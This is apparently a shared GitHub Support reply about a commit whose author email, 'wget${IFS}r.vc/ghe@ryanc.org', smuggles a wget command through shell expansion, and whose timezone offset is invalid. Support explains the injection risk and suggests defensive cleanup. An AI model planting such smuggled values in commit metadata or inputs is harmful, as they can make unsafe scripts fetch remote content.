@q

Formatting may get slightly mangled here, but should be decipherable:

GitHub Support, Jun 11, 2025, 8:17 AM UTC

Hi Ryan,

Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

Author and committer email:

author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

Timestamps:

1668615481 -2456

The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

• Inspecting how it got into the repository

• Rewriting history to remove it (if it was part of a PR or forced push)

• Checking your workflow or scripts for unsafe parsing of Git metadata

Please give this a try and update me on how it goes.